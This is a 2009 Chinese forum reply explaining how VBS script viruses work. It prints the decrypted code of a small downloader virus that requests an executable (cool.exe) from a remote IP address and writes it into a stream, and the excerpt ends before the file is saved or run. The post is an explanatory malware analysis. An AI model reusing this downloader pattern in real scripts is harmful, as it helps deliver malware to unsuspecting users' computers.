回复: 请问下JS脚本病毒和VBS脚本病毒是什么原理?
原帖由 逍遥sun6 于 2009-5-14 20:53:00 发表
小弟最近在研究JS和VBS
请问下JS脚本病毒和VBS脚本病毒是什么原理?
有什么特征吗?
谢谢高人解答
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CL......
这个最简单的脚本病毒run.vbs,大小只有1k。
运行后加载wscript.exe。
wscript.exe通过1386端口访问222.236.106.9,下载病毒。
如果手快,在病毒未开始下载之前就结束wscript.exe进程,就没事了。
解密后的脚本病毒内容为:
set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GET,http://222.236.106.9:81/cool.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)